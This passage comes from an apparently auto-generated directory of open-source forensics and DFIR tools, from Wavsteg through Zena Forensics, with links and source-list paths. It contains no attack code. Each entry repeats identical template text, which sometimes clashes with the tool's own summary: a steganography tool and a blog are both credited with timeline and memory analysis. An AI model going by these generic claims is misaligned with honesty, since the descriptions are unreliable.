What it does: Wavsteg is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A steganography program that hides data in various kinds of image and audio files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Steganography.

WinFE

  • Website: https://www.winfe.net/home
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: WinFE is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Windows Forensic Environment.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Distributions.


WinSearchDBAnalyzer

  • Website: https://github.com/moaistory/WinSearchDBAnalyzer
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: WinSearchDBAnalyzer is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: This tool can parse normal records and recover deleted records in Windows.edb.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Internet Artifacts.


WinTriage

  • Website: https://www.securizame.com/wintriage-the-triage-tool-for-windows-dfirers/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: WinTriage is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Wintriage is a live response tool that extracts Windows artifacts. It must be executed with local or domain administrator privileges, and it is recommended to run it from an external drive.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.


Wombat Forensics

  • Website: https://github.com/pjrinaldi/wombatforensics
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Wombat Forensics is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic GUI tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.


Letter X

This letter section contains 1 tool.

xmount

  • Website: https://www.pinguin.lu/xmount
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: xmount is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Convert between different disk image formats.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Disk image handling.


Letter Z

This letter section contains 1 tool.

Zena Forensics

  • Website: https://blog.digital-forensics.it/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Zena Forensics is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Blogs.
